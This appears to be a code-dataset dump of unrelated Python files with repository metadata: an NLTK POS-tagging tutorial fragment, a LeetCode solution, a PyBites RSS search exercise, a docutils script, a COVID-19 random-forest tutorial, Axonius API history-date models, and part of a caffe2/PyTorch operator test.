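brill_tagger = brill_trainer.BrillTaggerTrainer(t2, brill_templates, trace=2).train(train_sents, max_rules=10)
brill_tagger.evaluate(test_sents)
brill_tagger.rules()  # the learned, human-readable transformation rules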
# 7. How to determine the category of a word (word-class tagging)
# Linguists use morphology, syntax and semantics to determine a word's category
# 7.1. Morphological clues: the internal structure of a word helps with tagging (a quick corpus check follows at the end of this section).
# 7.2. Syntactic clues: the typical contexts in which the word can occur.
# 7.3. Semantic clues: the meaning of the word
# 7.4. Tagging new (unknown) words: open classes vs. closed classes
# 7.5. Morphology in part-of-speech tag sets
# Common tag sets capture word-formation information: the morphological marking a word acquires through its syntactic role.
# Most POS tag sets use the same basic categories; finer-grained tag sets contain more information about these forms.
# There is no single "correct way" to assign tags, only conventions that are more or less useful depending on one's goals
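# A quick corpus check (not in the original) of the "morphological clue" idea above:
# which tag is most frequent for words ending in a given two-letter suffix?
suffix_fd = nltk.ConditionalFreqDist(
    (word[-2:].lower(), tag)
    for (word, tag) in brown_tagged_words)
for suffix in ['ly', 'ed', 'es', 'er', 'ss']:
    print(suffix, suffix_fd[suffix].max())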
# 8. Summary
# Words can be grouped into classes, called lexical categories or parts of speech.
# Parts of speech can be assigned short labels, or tags
# Part-of-speech tagging, POS tagging, or simply tagging: the process of automatically assigning parts of speech to the words in a text
# Some language corpora have already been POS-tagged
# Taggers can be trained and evaluated using tagged corpora
# Combined tagging: chain several tagging methods together (default tagger, regexp tagger, unigram tagger, N-gram tagger) using the backoff technique
# Backoff is a method for combining models: when a more specialised model cannot assign a tag to the given input, it falls back to a more general model
# POS tagging is a sequence-classification task: the classification decision at any point in the sequence uses the words and tags in the local context
# Dictionaries are used to map between arbitrary types of information
# N-gram taggers can be defined for different values of n; when n is too large they face the data sparsity problem -- even with a lot of training data we only ever see a fraction of the possible contexts
# Transformation-based tagging learns a series of repair rules of the form "change tag s to tag t in context c"; each rule fixes errors but may also introduce new ones
| [
"[email protected]"
] | |
e9d7a998d87c612243828fe66e6007202c86f686 | 0b40232eb2395c27353c892ef4ccb5c604bb75be | /Hash Table/Find_the_difference.py | 7428e82614a50c081c15dbd870c2e3841fab9f12 | [] | no_license | HareshNasit/LeetCode | 971ae9dd5e4f0feeafa5bb3bcf5b7fa0a514d54d | 674728af189aa8951a3fcb355b290f5666b1465c | refs/heads/master | 2021-06-18T07:37:40.121698 | 2021-02-12T12:30:18 | 2021-02-12T12:30:18 | 168,089,751 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
map_s = collections.defaultdict(int)
for i in s:
map_s[i] += 1 #Automatically adds any missing value to the dictionary.
for j in t:
map_s[j] -= 1
if map_s[j] == -1:
return j
| [
"[email protected]"
] | |
b04e5ea723f86e59d1873259177661d9672e62f6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/advanced/050_make_pybites_search_engine_feedparser/save4_nopass.py | 8dbd7f2c13334bb8bd7ec12ff179a1105f74a635 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 5,865 | py | from datetime import datetime
from collections import namedtuple
from time import mktime
from feedparser import parse
import re
import xml.etree.ElementTree as ET
# FEED = 'https://bites-data.s3.us-east-2.amazonaws.com/all.rss.xml'
Entry = namedtuple('Entry', 'date title link tags')
class AttrDict(dict):
"""feedparser lets you access dict keys as attributes, hence a bit of
mocking, got this from https://stackoverflow.com/a/14620633.
PyBites uses this class for parsing"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
dt1 = datetime(2018, 2, 18, 19, 52, 0).timetuple()
dt2 = datetime(2017, 1, 6, 11, 0, 0).timetuple()
FEED = AttrDict({'entries':
[AttrDict({'author': 'PyBites',
'link':
'https://pybit.es/twitter_digest_201808.html', # noqa E501
'published': 'Sun, 18 Feb 2018 20:52:00 +0100', # noqa E501
'published_parsed': dt1,
'summary': 'Every weekend we share ...',
'tags': [AttrDict({'term': 'twitter'}),
AttrDict({'term': 'Flask'}),
AttrDict({'term': 'Python'}),
AttrDict({'term': 'Regex'})],
'title': 'Twitter Digest 2018 Week 08'}),
AttrDict({'author': 'Julian',
'link': 'https://pybit.es/pyperclip.html',
'published': 'Fri, 06 Jan 2017 12:00:00 +0100', # noqa E501
'published_parsed': dt2,
'summary': 'Use the Pyperclip module to ...',
'tags': [AttrDict({'term': 'python'}),
AttrDict({'term': 'tips'}),
AttrDict({'term': 'tricks'}),
AttrDict({'term': 'code'}),
AttrDict({'term': 'pybites'})],
'title': 'Copy and Paste with Pyperclip'})]})
def _convert_struct_time_to_dt(stime):
"""Convert a time.struct_time as returned by feedparser into a
datetime.date object, so:
time.struct_time(tm_year=2016, tm_mon=12, tm_mday=28, ...)
-> date(2016, 12, 28)
"""
if type(stime) == str:
format = '%a, %d %b %Y %H:%M:%S %z'
dt_object = datetime.strptime(stime, format)
return dt_object.date()
else:
return datetime.fromtimestamp(mktime(stime)).date()
def get_feed_entries(feed=FEED):
"""Use feedparser to parse PyBites RSS feed.
Return a list of Entry namedtuples (date = date, drop time part)
"""
if type(feed) == AttrDict:
file = feed
else:
file = parse(feed)
output = []
for entry in file.entries:
date = _convert_struct_time_to_dt(entry.published)
tag_list = [tag['term'].lower() for tag in entry.tags]
output.append(Entry(date, entry.title, entry.link, tag_list))
return output
def filter_entries_by_tag(search, entry):
"""Check if search matches any tags as stored in the Entry namedtuple
(case insensitive, only whole, not partial string matches).
Returns bool: True if match, False if not.
Supported searches:
1. If & in search do AND match,
e.g. flask&api should match entries with both tags
2. Elif | in search do an OR match,
e.g. flask|django should match entries with either tag
3. Else: match if search is in tags
"""
search = search.lower()
tag_list = [tag for tag in entry.tags]
if not re.search(r'\|', search) and not re.search(r'\&', search):
return search in tag_list
if re.search(r'\|', search):
search = re.split(r'\|', search)
return any([item in tag_list for item in search])
if re.search(r'\&', search):
search = re.split(r'\&', search)
return all([item in tag_list for item in search])
return search
def main():
"""Entry point to the program
1. Call get_feed_entries and store them in entries
2. Initiate an infinite loop
3. Ask user for a search term:
- if enter was hit (empty string), print 'Please provide a search term'
- if 'q' was entered, print 'Bye' and exit/break the infinite loop
4. Filter/match the entries (see filter_entries_by_tag docstring)
5. Print the title of each match ordered by date ascending
6. Secondly, print the number of matches: 'n entries matched'
(use entry if only 1 match)
"""
entries = get_feed_entries()
while True:
try:
search_term = input('Search for (q for exit): ').lower()
except EOFError:
break
if search_term == '':
print('Please provide a search term')
if search_term != '' and search_term != 'q':
output_list = []
for entry in entries:
if filter_entries_by_tag(search_term, entry):
output_list.append(entry)
output_list = sorted(output_list, key=lambda x: x.date)
titles = ', '.join([entry.title for entry in output_list])
output_number = len(output_list)
if output_number < 1:
print(f'{output_number} entries matched')
if output_number == 1:
print(titles)
print(f'{output_number} entry matched')
if output_number > 1:
print(titles)
print(f'{output_number} entries matched')
if search_term == 'q':
print('Bye')
break
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
5516c3e347802f4b350ee2dbcccabaeb477b3a74 | 9447fc5874b2edbc5d50d97d1415459d7c0a9a23 | /env/bin/rstpep2html.py | 80e9bd3423e0ff556c539c40519718befa2fd10f | [] | no_license | ivan-podorozhnyi-tr/flask_zappa | b9d11976a2b5d1a315258984ffde6199b4013576 | aba4c482d90ceb5161010e4e4edb9b63feb00735 | refs/heads/master | 2022-11-02T04:11:20.531599 | 2019-10-10T10:31:03 | 2019-10-10T10:31:03 | 214,153,564 | 0 | 1 | null | 2022-10-10T20:02:44 | 2019-10-10T10:28:49 | Python | UTF-8 | Python | false | false | 701 | py | #!/home/ivan/projects/flask_zappa/env/bin/python3
# $Id: rstpep2html.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing HTML from PEP
(Python Enhancement Proposal) documents.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML from reStructuredText-format PEP files. '
+ default_description)
publish_cmdline(reader_name='pep', writer_name='pep_html',
description=description)
| [
"[email protected]"
] | |
1ecb741be63c3d4f4cf27a1f9a5077afa206c9e7 | 587bd3458aadb1f06bd576aab46a7d294d6a0ee2 | /session47.py | cba6a34daa4a8c2c7d7d7bcde7ea6d8900069b81 | [] | no_license | Shimpa11/PythonTutorial | 913635dbbd1f8ed6e2331614040a4f76d22ebacf | 5e5dfe003e5ccf84d4e9754d3192e43009c20c56 | refs/heads/master | 2020-12-13T16:48:12.093667 | 2020-05-08T12:21:27 | 2020-05-08T12:21:27 | 234,344,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,587 | py | """
Overfitting and underfitting -> the regression line does not fit the
predicted values well; we want a good (robust) fit.
Decision-tree (DT) limitations:
- computationally expensive to train
- carry a big risk of overfitting
ENSEMBLE LEARNING
Supervised learning in which a number of models are combined for prediction.
BOOSTING -> a group of algorithms that use weighted averages to turn weak learners
into stronger learners; each model feeds its predictions to the next model,
so the process is essentially sequential (synchronous).
BOOTSTRAP AGGREGATION (BAGGING)
Runs the models independently and aggregates their outputs at the end, with no
preference for any single model (asynchronous / multithreading-friendly).
Random Forest algorithm
-> classification and regression
-> a bagging technique: the models (trees) run in parallel with no interaction
Trees in a Random Forest:
the algorithm constructs a multitude of decision trees at training time and outputs
the class that is the mode of the classes (or the mean prediction for regression).
1. Decide how many decision trees to use.
2. Divide the dataset into n subsets of instances,
   e.g. a dataset with 100 records and n = 3:
   T1 -> 33, T2 -> 33, T3 -> 34,
   i.e. three decision trees; the predictions from T1, T2 and T3 are combined
   for the final prediction.
(A short bagging-vs-boosting sketch follows this docstring.)
"""
# working on covid 19 dataset
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
import statsmodels.api as sm
from sklearn.preprocessing import FunctionTransformer
df=pd.read_csv("covid19-world.csv")
print(df)
indiaDF=df[df['Country']=='India']
print(indiaDF)
X=indiaDF['Date']
Y=indiaDF['Confirmed']
# log=PowerTransformer()
# log.fit(df[['Date']])
# df['log_convertedDF']=log.transform(df[['Date']])
# X=df['log_convertedDF']
print("data for X:")
print(X)
print("Data for Y:")
print(Y)
# plt.plot(X,Y)
# plt.xlabel("Date")
# plt.ylabel("Confirmed cases")
# plt.grid(True)
# plt.show()
# formatting date for our graph
fig,ax=plt.subplots()
ax.plot_date(X,Y, marker='',linestyle="-.")
fig.autofmt_xdate()
plt.show()
# create the model
# 100 DTrees in our model who shall work with bagging technique
model=RandomForestRegressor(n_estimators=100)
# train the model
# transform into 2D array
# X=X[:,np.newaxis]
# date is in string format cannot train model on string
# so we get an error
# So we data Preprocessing-> refining dataset so optimally so that model works perfectly fine
# new transformation
X1=pd.to_datetime(indiaDF['Date'],infer_datetime_format=True)
print(type(X1))
# lg=np.log(indiaDF['Date'])
# X1=pd.to_datetime(indiaDF['Date'],format='%Y-%m-%d')
# converting date type string to datetime which is mathematical
X1 = X1.values[:, np.newaxis]  # use .values: multi-dimensional indexing on a Series is removed in newer pandas
print(X1)
print()
print(type(X1))
# model.fit(X, Y) -> generates an error with X (the dates are still strings)
x_train, x_test, y_train,y_test=train_test_split(X1,Y,test_size=0.2,random_state=1)
# model.fit(X1,Y)
model.fit(x_train,y_train)
# X=sm.add_constant(X)
# model=sm.OLS(y_train,X)
print("Model Trained")
y_pred=model.predict(x_test)
# print(y_pred)
# print(x_test)
#
futurePredictionDates=pd.Series(['2020-02-12','2020-03-12','2020-04-12','2020-05-12'])
futurePredictionDates=pd.to_datetime(futurePredictionDates,infer_datetime_format=True)
print("==========================================")
# 2D array
futurePredictionDates = futurePredictionDates.values[:, np.newaxis]  # 2-D array, as required by model.predict
futureConfirmedPredictions=model.predict(futurePredictionDates)
print(futurePredictionDates)
print(futureConfirmedPredictions)
# The regression model lags because the predictions are not accurate: the data grows exponentially, not linearly.
# Conclusion: the predictions are not accurate.
# Since our dataset shows exponential behaviour,
# we need to do some more pre-processing (see the sketch below).
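# A possible next pre-processing step (a sketch, not part of the original session):
# confirmed-case counts grow roughly exponentially, so training on log1p(Y) and
# inverting the predictions with expm1 gives the forest a better-behaved target.
y_log = np.log1p(Y)
x_train_log, x_test_log, y_train_log, y_test_log = train_test_split(X1, y_log, test_size=0.2, random_state=1)
log_model = RandomForestRegressor(n_estimators=100)
log_model.fit(x_train_log, y_train_log)
print(np.expm1(log_model.predict(x_test_log)))             # back on the original case-count scale
print(np.expm1(log_model.predict(futurePredictionDates)))  # future predictions, case-count scale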
| [
"[email protected]"
] | |
fd673bb693206262ce291422603e04587290cc7c | 5686d1a31b87a47a4774270c00cd141c221cf065 | /axonius_api_client/api/json_api/assets/history_dates_human.py | 35f27f8e20051c05403c10b6c37ebc27af60b4a1 | [
"MIT"
] | permissive | Axonius/axonius_api_client | e7eec0845eee9e1b314446121551c584655c2631 | be49566e590834df1b46494c8588651fa029b8c5 | refs/heads/master | 2023-08-19T04:43:13.717989 | 2023-08-10T18:49:40 | 2023-08-10T18:49:40 | 194,601,817 | 17 | 22 | MIT | 2023-08-30T18:45:15 | 2019-07-01T04:52:21 | Python | UTF-8 | Python | false | false | 7,266 | py | # -*- coding: utf-8 -*-
"""Models for API requests & responses."""
import dataclasses
import datetime
import logging
import typing as t
from ....exceptions import ApiError
from ....tools import coerce_int, dt_now, dt_parse
from ..base import BaseModel
LOGGER = logging.getLogger(__name__)
@dataclasses.dataclass
class AssetTypeHistoryDate(BaseModel):
"""Human exposure of history date for a specific asset type."""
date_api: str
date_api_exact: str
asset_type: str
document_meta: t.Optional[dict] = dataclasses.field(default_factory=dict)
@property
def days_ago(self) -> int:
"""Number of days since date_api passed."""
return self.delta.days
@property
def delta(self) -> datetime.timedelta:
"""Pass."""
return dt_now() - self.date
def calculate_delta(self, value: datetime.datetime) -> datetime.timedelta:
"""Calculate the delta between the date property and a given datetime object."""
return abs(self.date - value)
def calculate_days_ago(self, value: datetime.datetime) -> int:
"""Calculate the number of days between the date property and a given datetime object."""
return self.calculate_delta(value=value).days
@property
def date(self) -> datetime.datetime:
"""Get the history date as datetime object."""
if not hasattr(self, "_date"):
setattr(self, "_date", dt_parse(obj=self.date_api_exact, default_tz_utc=True))
return getattr(self, "_date")
def __str__(self) -> str:
"""Pass."""
return f"date={self.date}, days_ago={self.days_ago}"
@staticmethod
def get_schema_cls() -> t.Any:
"""Get the schema for this model."""
return None
@dataclasses.dataclass
class AssetTypeHistoryDates(BaseModel):
"""Human exposure of history dates for a specific asset type."""
asset_type: str
values: dict
document_meta: t.Optional[dict] = dataclasses.field(default_factory=dict)
DATE_ONLY_FMT: t.ClassVar[str] = "%Y-%m-%d"
DATE_ONLY_VALID_FMTS: t.ClassVar[t.List[str]] = ["YYYY-MM-DD", "YYYYMMDD"]
@property
def dates(self) -> t.List[AssetTypeHistoryDate]:
"""Get the valid history dates for this asset type."""
if not hasattr(self, "_dates"):
# noinspection PyAttributeOutsideInit
self._dates = [
AssetTypeHistoryDate(date_api=k, date_api_exact=v, asset_type=self.asset_type)
for k, v in self.values.items()
]
return self._dates
@property
def dates_by_days_ago(self) -> t.Dict[int, AssetTypeHistoryDate]:
"""Get the valid history dates for this asset type keyed by days_ago."""
return {x.days_ago: x for x in self.dates}
def get_date_nearest(
self, value: t.Union[str, bytes, datetime.timedelta, datetime.datetime]
) -> t.Optional[AssetTypeHistoryDate]:
"""Get a valid history date that is nearest to the supplied value."""
nearest: t.Optional[AssetTypeHistoryDate] = None
if self.dates:
pivot: datetime.datetime = dt_parse(obj=value, default_tz_utc=True)
nearest: AssetTypeHistoryDate = min(self.dates, key=lambda x: x.calculate_delta(pivot))
LOGGER.info(f"Closest {self.asset_type} history date to {pivot} found: {nearest}")
return nearest
def get_date_nearest_days_ago(self, value: int) -> t.Optional[AssetTypeHistoryDate]:
"""Get a valid history date that is nearest to the supplied value."""
nearest: t.Optional[AssetTypeHistoryDate] = None
if self.dates:
pivot: int = coerce_int(value)
nearest = min(
self.dates,
key=lambda x: x.days_ago - pivot if x.days_ago >= pivot else pivot - x.days_ago,
)
LOGGER.info(f"Closest {self.asset_type} history days ago to {pivot} found: {nearest}")
return nearest
def get_date_by_date(
self,
value: t.Optional[t.Union[str, datetime.timedelta, datetime.datetime]] = None,
exact: bool = True,
) -> t.Optional[str]:
"""Get a valid history date.
Args:
value: date to get history date for
exact: if True, raise error if date is not valid, else return nearest valid date
"""
if value:
try:
dt: datetime.datetime = dt_parse(obj=value, default_tz_utc=True)
except Exception:
valid = " or ".join(self.DATE_ONLY_VALID_FMTS)
raise ApiError(f"Invalid history date format {value!r}, format must be {valid}")
date_api: str = dt.strftime(self.DATE_ONLY_FMT)
if date_api in self.values:
return self.values[date_api]
if exact:
err = f"Invalid exact history date {date_api!r}"
raise ApiError(f"{err}\n\n{self}\n\n{err}")
nearest: t.Optional[AssetTypeHistoryDate] = self.get_date_nearest(value=dt)
if isinstance(nearest, AssetTypeHistoryDate):
return nearest.date_api_exact
def get_date_by_days_ago(
self, value: t.Optional[t.Union[int, str]] = None, exact: bool = True
) -> t.Optional[str]:
"""Get date by number of days ago.
Args:
value: days ago to get history date for
exact: if True, raise error if days ago is not valid, else return nearest valid date
"""
if value is not None:
value: int = coerce_int(value)
if value in self.dates_by_days_ago:
return self.dates_by_days_ago[value].date_api_exact
if exact and value != 0:
nums = sorted(list(self.dates_by_days_ago))
err = f"Invalid exact days ago {value!r} (highest={nums[-1]}, lowest={nums[0]})"
raise ApiError(f"{err}\n{self}\n\n{err}")
nearest: t.Optional[AssetTypeHistoryDate] = self.get_date_nearest_days_ago(value=value)
if isinstance(nearest, AssetTypeHistoryDate):
return nearest.date_api_exact
def get_date(
self,
date: t.Optional[t.Union[str, datetime.timedelta, datetime.datetime]] = None,
days_ago: t.Optional[t.Union[int, str]] = None,
exact: bool = True,
) -> t.Optional[str]:
"""Get a valid history date by a specific date or number of days ago.
Args:
date: date to get history date for
days_ago: days ago to get history date for
exact: if True, raise error if date is not valid, else return nearest valid date
"""
return self.get_date_by_date(value=date, exact=exact) or self.get_date_by_days_ago(
value=days_ago, exact=exact
)
@staticmethod
def get_schema_cls() -> t.Any:
"""Get the schema for this model."""
return None
def __repr__(self) -> str:
"""Pass."""
return f"asset_type={self.asset_type}, count={len(self.dates)}"
def __str__(self) -> str:
"""Pass."""
items = [
f"Valid history dates for {self.asset_type}:",
*[f"{x}" for x in self.dates],
]
return "\n".join(items)
| [
"[email protected]"
] | |
b53f31bab239e974a44b18dc9a112a5067df68ee | 00687ee434e9ff98d452c8ca69897d503eecdbc7 | /caffe2/python/operator_test/torch_integration_test.py | 628512953dcae9cc9091baba095ea34250a78002 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | ajliu/pytorch | 8a7bc45c027a8783705d8aa8a308d7647b8a4494 | 7d809f5d8e93cb6d332297ece071083845e30e26 | refs/heads/master | 2022-12-27T11:53:12.876850 | 2020-10-02T20:08:49 | 2020-10-02T20:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,509 | py |
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
import struct
import torch
import unittest
from caffe2.python import core, workspace
from hypothesis import given, settings
from scipy.stats import norm
def generate_rois(roi_counts, im_dims):
assert len(roi_counts) == len(im_dims)
all_rois = []
for i, num_rois in enumerate(roi_counts):
if num_rois == 0:
continue
# [batch_idx, x1, y1, x2, y2]
rois = np.random.uniform(0, im_dims[i], size=(roi_counts[i], 5)).astype(
np.float32
)
rois[:, 0] = i # batch_idx
# Swap (x1, x2) if x1 > x2
rois[:, 1], rois[:, 3] = (
np.minimum(rois[:, 1], rois[:, 3]),
np.maximum(rois[:, 1], rois[:, 3]),
)
# Swap (y1, y2) if y1 > y2
rois[:, 2], rois[:, 4] = (
np.minimum(rois[:, 2], rois[:, 4]),
np.maximum(rois[:, 2], rois[:, 4]),
)
all_rois.append(rois)
if len(all_rois) > 0:
return np.vstack(all_rois)
return np.empty((0, 5)).astype(np.float32)
def generate_rois_rotated(roi_counts, im_dims):
rois = generate_rois(roi_counts, im_dims)
# [batch_id, ctr_x, ctr_y, w, h, angle]
rotated_rois = np.empty((rois.shape[0], 6)).astype(np.float32)
rotated_rois[:, 0] = rois[:, 0] # batch_id
rotated_rois[:, 1] = (rois[:, 1] + rois[:, 3]) / 2.0 # ctr_x = (x1 + x2) / 2
rotated_rois[:, 2] = (rois[:, 2] + rois[:, 4]) / 2.0 # ctr_y = (y1 + y2) / 2
rotated_rois[:, 3] = rois[:, 3] - rois[:, 1] + 1.0 # w = x2 - x1 + 1
rotated_rois[:, 4] = rois[:, 4] - rois[:, 2] + 1.0 # h = y2 - y1 + 1
rotated_rois[:, 5] = np.random.uniform(-90.0, 90.0) # angle in degrees
return rotated_rois
def create_bbox_transform_inputs(roi_counts, num_classes, rotated):
batch_size = len(roi_counts)
total_rois = sum(roi_counts)
im_dims = np.random.randint(100, 600, batch_size)
rois = (
generate_rois_rotated(roi_counts, im_dims)
if rotated
else generate_rois(roi_counts, im_dims)
)
box_dim = 5 if rotated else 4
deltas = np.random.randn(total_rois, box_dim * num_classes).astype(np.float32)
im_info = np.zeros((batch_size, 3)).astype(np.float32)
im_info[:, 0] = im_dims
im_info[:, 1] = im_dims
im_info[:, 2] = 1.0
return rois, deltas, im_info
# Eigen/Python round 0.5 away from 0, Numpy rounds to even
round_to_nearest = np.vectorize(round)
def bytes_to_floats(byte_matrix):
floats = np.empty([np.shape(byte_matrix)[0], 1], dtype=np.float32)
for i, byte_values in enumerate(byte_matrix):
floats[i], = struct.unpack('f', bytearray(byte_values))
return floats
def floats_to_bytes(floats):
byte_matrix = np.empty([np.shape(floats)[0], 4], dtype=np.uint8)
for i, value in enumerate(floats):
assert isinstance(value, np.float32), (value, floats)
as_bytes = struct.pack('f', value)
# In Python3 bytes will be a list of int, in Python2 a list of string
if isinstance(as_bytes[0], int):
byte_matrix[i] = list(as_bytes)
else:
byte_matrix[i] = list(map(ord, as_bytes))
return byte_matrix
def fused_rowwise_8bit_quantize_reference(data):
minimum = np.min(data, axis=1, keepdims=True)
maximum = np.max(data, axis=1, keepdims=True)
span = maximum - minimum
bias = minimum
scale = span / 255.0
inverse_scale = 255.0 / (span + 1e-8)
quantized_data = round_to_nearest((data - bias) * inverse_scale)
scale_bytes = floats_to_bytes(scale.reshape(-1))
bias_bytes = floats_to_bytes(bias.reshape(-1))
return np.concatenate([quantized_data, scale_bytes, bias_bytes], axis=1)
def fused_rowwise_8bit_quantize_dequantize_reference(data):
fused_quantized = fused_rowwise_8bit_quantize_reference(data)
scale = bytes_to_floats(fused_quantized[:, -8:-4].astype(np.uint8))
bias = bytes_to_floats(fused_quantized[:, -4:].astype(np.uint8))
quantized_data = fused_quantized[:, :-8]
return quantized_data * scale + bias
class TorchIntegration(hu.HypothesisTestCase):
@given(
roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10),
num_classes=st.integers(1, 10),
rotated=st.booleans(),
angle_bound_on=st.booleans(),
clip_angle_thresh=st.sampled_from([-1.0, 1.0]),
**hu.gcs_cpu_only
)
def test_bbox_transform(
self,
roi_counts,
num_classes,
rotated,
angle_bound_on,
clip_angle_thresh,
gc,
dc,
):
"""
Test with rois for multiple images in a batch
"""
rois, deltas, im_info = create_bbox_transform_inputs(
roi_counts, num_classes, rotated
)
def bbox_transform_ref():
ref_op = core.CreateOperator(
"BBoxTransform",
["rois", "deltas", "im_info"],
["box_out"],
apply_scale=False,
rotated=rotated,
angle_bound_on=angle_bound_on,
clip_angle_thresh=clip_angle_thresh,
)
workspace.FeedBlob("rois", rois)
workspace.FeedBlob("deltas", deltas)
workspace.FeedBlob("im_info", im_info)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("box_out")
box_out = torch.tensor(bbox_transform_ref())
a, b = torch.ops._caffe2.BBoxTransform(
torch.tensor(rois),
torch.tensor(deltas),
torch.tensor(im_info),
[1.0, 1.0, 1.0, 1.0],
False,
rotated,
angle_bound_on,
-90,
90,
clip_angle_thresh,
legacy_plus_one=True,
)
torch.testing.assert_allclose(box_out, a)
@given(
roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10),
num_classes=st.integers(1, 10),
rotated=st.booleans(),
angle_bound_on=st.booleans(),
clip_angle_thresh=st.sampled_from([-1.0, 1.0]),
**hu.gcs_cpu_only
)
def test_box_with_nms_limits(
self,
roi_counts,
num_classes,
rotated,
angle_bound_on,
clip_angle_thresh,
gc,
dc,
):
rotated = False # FIXME remove this after rotation is supported
rois, deltas, im_info = create_bbox_transform_inputs(
roi_counts, num_classes, rotated
)
pred_bbox, batch_splits = [
t.detach().numpy()
for t in torch.ops._caffe2.BBoxTransform(
torch.tensor(rois),
torch.tensor(deltas),
torch.tensor(im_info),
[1.0, 1.0, 1.0, 1.0],
False,
rotated,
angle_bound_on,
-90,
90,
clip_angle_thresh,
legacy_plus_one=True,
)
]
class_prob = np.random.randn(sum(roi_counts), num_classes).astype(np.float32)
score_thresh = 0.5
nms_thresh = 0.5
topk_per_image = sum(roi_counts) / 2
def box_with_nms_limit_ref():
input_blobs = ["class_prob", "pred_bbox", "batch_splits"]
output_blobs = [
"score_nms",
"bbox_nms",
"class_nms",
"batch_splits_nms",
"keeps_nms",
"keeps_size_nms",
]
ref_op = core.CreateOperator(
"BoxWithNMSLimit",
input_blobs,
output_blobs,
score_thresh=float(score_thresh),
nms=float(nms_thresh),
detections_per_im=int(topk_per_image),
soft_nms_enabled=False,
soft_nms_method="linear",
soft_nms_sigma=0.5,
soft_nms_min_score_thres=0.001,
rotated=rotated,
)
workspace.FeedBlob("class_prob", class_prob)
workspace.FeedBlob("pred_bbox", pred_bbox)
workspace.FeedBlob("batch_splits", batch_splits)
workspace.RunOperatorOnce(ref_op)
return (workspace.FetchBlob(b) for b in output_blobs)
output_refs = box_with_nms_limit_ref()
outputs = torch.ops._caffe2.BoxWithNMSLimit(
torch.tensor(class_prob),
torch.tensor(pred_bbox),
torch.tensor(batch_splits),
score_thresh=float(score_thresh),
nms=float(nms_thresh),
detections_per_im=int(topk_per_image),
soft_nms_enabled=False,
soft_nms_method="linear",
soft_nms_sigma=0.5,
soft_nms_min_score_thres=0.001,
rotated=rotated,
cls_agnostic_bbox_reg=False,
input_boxes_include_bg_cls=True,
output_classes_include_bg_cls=True,
legacy_plus_one=True,
)
for o, o_ref in zip(outputs, output_refs):
torch.testing.assert_allclose(o, o_ref)
@given(
dim_1=st.integers(min_value=10, max_value=10),
dim_2=st.integers(min_value=3, max_value=3),
dim_3=st.integers(min_value=2, max_value=2),
)
def test_sparse_to_dense_mask(self, dim_1, dim_2, dim_3):
indices = np.array([i + 1 for i in range(dim_1)]).astype(np.int32)
values = np.random.rand(dim_1, dim_2, dim_3).astype(np.float32)
default_value = np.zeros((dim_2, dim_3)).astype(np.float32)
mask = [2, 4, 9]
def sparse_to_dense_mask_ref(return_presence_mask=False):
ref_op = core.CreateOperator(
"SparseToDenseMask",
["indices", "values", "default_value"],
["output", "presence_mask"],
mask=mask,
return_presence_mask=return_presence_mask,
)
workspace.FeedBlob("indices", indices)
workspace.FeedBlob("values", values)
workspace.FeedBlob("default_value", default_value)
workspace.RunOperatorOnce(ref_op)
if return_presence_mask:
return (
workspace.FetchBlob("output"),
workspace.FetchBlob("presence_mask"),
)
return workspace.FetchBlob("output")
# Testing return_presence_mask = False
output = sparse_to_dense_mask_ref()
output = torch.tensor(output)
a, _ = torch.ops._caffe2.SparseToDenseMask(
torch.tensor(indices),
torch.tensor(values),
torch.tensor(default_value),
None,
mask=mask,
)
torch.testing.assert_allclose(output, a)
# Testing return_presence_mask = True
output, presence_mask = sparse_to_dense_mask_ref(return_presence_mask=True)
output = torch.tensor(output)
presence_mask = torch.tensor(presence_mask)
a, b = torch.ops._caffe2.SparseToDenseMask(
torch.tensor(indices),
torch.tensor(values),
torch.tensor(default_value),
None,
mask=mask,
return_presence_mask=True,
)
torch.testing.assert_allclose(output, a)
torch.testing.assert_allclose(presence_mask, b)
@given(
A=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
img_count=st.integers(min_value=3, max_value=3),
)
def test_generate_proposals(self, A, H, W, img_count):
scores = np.ones((img_count, A, H, W)).astype(np.float32)
bbox_deltas = (
np.linspace(0, 10, num=img_count * 4 * A * H * W)
.reshape((img_count, 4 * A, H, W))
.astype(np.float32)
)
im_info = np.ones((img_count, 3)).astype(np.float32) / 10
anchors = np.ones((A, 4)).astype(np.float32)
def generate_proposals_ref():
ref_op = core.CreateOperator(
"GenerateProposals",
["scores", "bbox_deltas", "im_info", "anchors"],
["rois", "rois_probs"],
spatial_scale=2.0,
)
workspace.FeedBlob("scores", scores)
workspace.FeedBlob("bbox_deltas", bbox_deltas)
workspace.FeedBlob("im_info", im_info)
workspace.FeedBlob("anchors", anchors)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("rois"), workspace.FetchBlob("rois_probs")
rois, rois_probs = generate_proposals_ref()
rois = torch.tensor(rois)
rois_probs = torch.tensor(rois_probs)
a, b = torch.ops._caffe2.GenerateProposals(
